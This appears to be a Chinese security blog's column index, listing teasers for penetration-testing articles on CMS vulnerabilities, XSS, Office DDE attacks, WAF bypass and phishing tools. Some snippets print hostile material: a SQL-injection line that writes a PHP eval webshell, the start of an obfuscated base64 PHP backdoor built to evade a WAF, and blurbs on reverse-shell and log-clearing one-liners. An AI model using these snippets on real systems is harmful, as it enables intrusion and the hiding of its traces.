首页
学习
活动
专区
工具
TVP
发布

小白安全

菜鸟安全
专栏作者
126
文章
242326
阅读量
55
订阅数
重置dedecms管理员后台密码重现及分析
0×00 概述 2018年1月,网上爆出dedecms v5.7 sp2的前台任意用户密码重置和前台任意用户登录漏洞,加上一个管理员前台可修改其后台密码的安全问题,形成漏洞利用链,这招组合拳可以重置管理员后台密码。 先来看看整体利用流程:    重置admin前台密码—>用admin登录前台—>重置admin前后台密码 0×01 前台任意用户密码重置分析 组合拳第一式:重置管理员前台密码 漏洞文件:member\resetpassword.php:75 else if(
奶糖味的代言
2018-04-16
6.4K0
FEERBUF--Microsoft Office之DDE攻击
Microsoft Office可以说是使用最广泛的办公软件。然而就是因为这样,也使它成为了黑客的主要攻击目标之一,例如在网络安全对抗赛中红队会用它来窃取域哈希,甚至执行任意代码。 从以往的攻击手法上看,在Microsoft Office中执行任意代码往往是通过宏来实现的。那么,有没有其它方法可以实现任意代码执行呢?答案是肯定的。SensePost就发现了一种利用DDE(动态数据交换)协议,来执行任意代码的方法。办公产品内有许多可通过DDE接收代码并执行的地方,本文我将为大家演示一些这类攻击的常用手
奶糖味的代言
2018-04-16
2K0
XSS跨站脚本攻击的原理分析与解剖
《xss攻击手法》一开始在互联网上资料并不多(都是现成的代码,没有从基础的开始),直到刺的《白帽子讲WEB安全》和cn4rry的《XSS跨站脚本攻击剖析与防御》才开始好转。 我这里就不说什么xss的历史什么东西了,xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因有下: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完成自动化攻击 4、前期需要基本的html、js功底,后期需要扎实的html、js、actionscript2/3.0等语言的功底 5、是一种被动的攻击
奶糖味的代言
2018-04-16
1.5K0
EMLOG博客系统插件挂载点及说明
挂载点:doAction('adm_main_top') 所在文件:admin/views/default/header.php 描述:后台红线区域扩展  挂载点:doAction('adm_head') 所在文件:admin/views/default/header.php 描述:后台头部扩展:可以用于增加后台css样式、加载js等 挂载点:doAction('adm_siderbar_ext') 所在文件:admin/views/default/header.php 描
奶糖味的代言
2018-04-16
1.1K0
记一次emlog明月浩空模板漏洞渗透
上午闲着没事做就到站长资源平台看了下免费换链 浏览博客类网站时候发现有个网站在使用emlog明月浩空的模板 就想起了以前明月浩空的模板不是有漏洞 然后抱着试一试的心态看了下漏洞
奶糖味的代言
2018-04-16
9890
渗透测试SHELL语句参考
SQL注入一句话: select '<? php eval($_POST[xiaobai]);?>' into outfile 'd:/wwwroot/1.php'; Linux清除访问日志一句话
奶糖味的代言
2018-04-16
5620
过安全狗waf注入技巧
 过安全狗waf注入 前提web页面存在注入漏洞 测试开始本地搭建环境 环境   安全狗(APACE版)V4.0 防护规则全开 绕过 1. 延时盲注 http
奶糖味的代言
2018-04-16
7870
某素材网扒下来情人节网页代码
素材网里卖几分钱的 效果图: 演示地址:http://www.17sucai.com/pins/demo-show?id=23136 提供代码下载 <!doctype html>
奶糖味的代言
2018-04-16
1.6K0
Web安全测试基础三
BeEF实战 BeEF是一个很强大的XSS演示平台,BeEF有一个控制后台,攻击者可以在后台控制前端的一切。 假如“http://www.xxx/abc.php?id=1”存在xss攻击漏
奶糖味的代言
2018-04-16
9820
危险漫步利用图片链接完成注入渗透
利用图片链接完成注入渗透 最近危险漫步闲着无聊就翻墙去国外看了一看黑客新闻,有一条新闻引起了我的关注,那就是国外某黑客黑了Word文档,导致了一家公司损失了数千万美金,整个事件我就不多说了,大家可以去去谷歌查看。 这次危险漫步要和大家讲的就是黑客与Word之间的故事。 Word经常被黑客利用来做一些黑产,这个事情我是知道的,但是我一直没有当回事我觉得这些都是小打小闹,可是当我自己真的开始实际操作的时候却发现,原来这里面真的是别有洞天啊~~ 打一个简单的比方就是,在进行Web应用渗
奶糖味的代言
2018-04-16
1.2K0
EvilURL 一个生成用于钓鱼攻击的IDN域名的工具
EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具 secist2018-01-27共191208人围观 ,发现 1 个不明物体 EvilURL v2.0是一个IDN同形异义字
奶糖味的代言
2018-04-16
1.3K0
PHP、ASP过安全狗一句话
php: <?php $a = $_GET['a']; $b = $_GET['b']; $c = base64_decode($a).base64_decode($b); $c =
奶糖味的代言
2018-04-16
1.7K0
渗透测试单行化工具One-Lin3r
One-Lin3r One-Lin3r是一款简单的轻量级框架,而该工具的灵感来自于Metasploit的web-delivery模块。该工具提供了多种命令,例如: 1.   Reverser:提供IP及端口号,它将返回一个可直接使用的反向Shell; 2.   Dropper:提供上传后们的URL地址,它将返回一个可操作的命令行; 功能介绍 1.   可通过全名或关键词在数据库中搜索one-liner命令; 2.
奶糖味的代言
2018-04-16
6570
安全扫描器Nmap渗透使用教程
介绍 nmap是用来探测计算机网络上的主机和服务的一种安全扫描器。为了绘制网络拓扑图Nmap的发送特制的数据包到目标主机然后对返回数据包进行分析。Nmap是一款枚举和测试网络的强大工具。 特点 主机探测 端口扫描 版本检测 支持探测脚本的编写 安装 官网:http://nmap.org 图形化:Zenmap 基本操作 参数详解 Nmap支持主机名,ip,网段的表示方式例如:blah.highon.coffee, namp.org/24
奶糖味的代言
2018-04-16
1.7K0
关于YUNUCMSv1.0.6 任意文件删除与配置文件写shell-freebuf漏斗社区发布
任意文件删除漏洞 0×00 相关环境 源码信息:YUNUCMSv1.0.6 问题文件: \YUNUCMSv1.0.6\statics\ueditor\php\vendor\Local.class.php 漏洞类型:任意文件删除漏洞 站点地址:http://www.yunucms.com/ 0×01 漏洞分析 在文件\YUNUCMSv1.0.6\statics\ueditor\php\vendor\Local.class.php的第3
奶糖味的代言
2018-04-16
1.1K0
检测是否含有挖矿脚本的WiFi热点
前几日看到一则新闻,一家星巴克店内无线网络被发现植入了恶意代码,劫持网络流量利用用户设备挖掘门罗币(XMR)。 与加密货币相关的安全事件总是引人注目,我们除了认识到门罗币具有一定的入手价值外,还
奶糖味的代言
2018-04-16
2.1K0
USB自动渗透手法总结
USB(Universal Serial Bus)原意是指通用串行总线,是一个外部总线标准,用于规范电脑与外部设备的连接和通讯,这套标准在1994年底由英特尔、康柏、IBM、Microsoft等多家公司联合提出,提出之后经过一个快速的发展成功替代串口和并口等标准,成为一个世界认可的统一标准,被当代的海量设备使用,而我们口中常说的USB其实是指采用USB接口标准的可移动存储介质,那么以下为了叙述方便我们便用USB或U盘指代采用USB接口标准的可移动存储介质来详细介绍常见的三种利用该类型设备的渗透手法。 一、a
奶糖味的代言
2018-04-16
1.9K0
XSS手工利用方式-FreeBuf.COM
0×00 vps 当我们在插入的xss,在客户端成功执行了相关的操作后,需要将获取的内容传递出来,可以选择购买VPS或者免费的dnslog平台通过get请求来接受数据。 在vps端有很多接
奶糖味的代言
2018-04-16
1.7K0
SQLMAP命令中文注释
sqlmap常用命令大全 sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.c
奶糖味的代言
2018-04-16
2K0
给emlog网站添加图片抖动效果
给emlog网站添加图片抖动效果,效果可以看本站 把以下代码放入公用css文件中 img:hover { -webkit-animation:sucaijiayuan 1s .1s ease both; -moz-animation:tada 1s .1s ease both; } @-webkit-keyframes sucaijiayuan { 0% { -webkit-transform:scale(1) } 10%, 20% { -webkit-transform:scale(0.8) ro
奶糖味的代言
2018-04-16
1.1K0
点击加载更多
社区活动
Python精品学习库
代码在线跑,知识轻松学
热点技术征文第五期
新风口Sora来袭,普通人该如何把握机会?
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·干货材料·成员作品·最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档